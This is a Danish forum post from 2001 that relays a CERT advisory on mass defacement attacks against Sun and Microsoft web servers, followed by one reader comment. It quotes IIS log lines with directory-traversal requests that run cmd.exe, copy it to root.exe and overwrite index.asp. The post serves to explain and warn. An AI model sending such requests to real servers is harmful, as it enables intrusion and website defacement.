![]() | ||
![]() | ||
![]() | ||
| Redegørelse fra CERT, omkring sikkerhedshul i SUN, MS software [13/05] af Objector | internet: |
Som de fleste sikkert ved har der været masive angreb mod SUN og MS webserver software. Det svært at sige hvor angrebet kommer fra. Dog er de fleste angreb sket fra IP adresser i asien. Gruppen prøvet at skifte hoved web siden ud med denne tekst:
Der er mange sites som er ramt, og der med fået deres forside skifte ud. Her er eks. på log filer fra en MS server de har angrebet: Sample Log from Attacked IIS Server 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/root.exe /c+echo+.././index.asp 502 - Læse meget mere på link herunder ! | ||||
| (2) | (www.cert.org) | ||
vlx
14-05-01 10:31
hehe ligner meget de angreb der var på nyheder.org for ikke så længe siden. Har kigget lidt i loggen engang imellem og er lidt overrasket over hvor mange der har prøvet bagefter. Men det er jo rart at det bliver logget så kan man jo altid se hvem der har forsøgt.

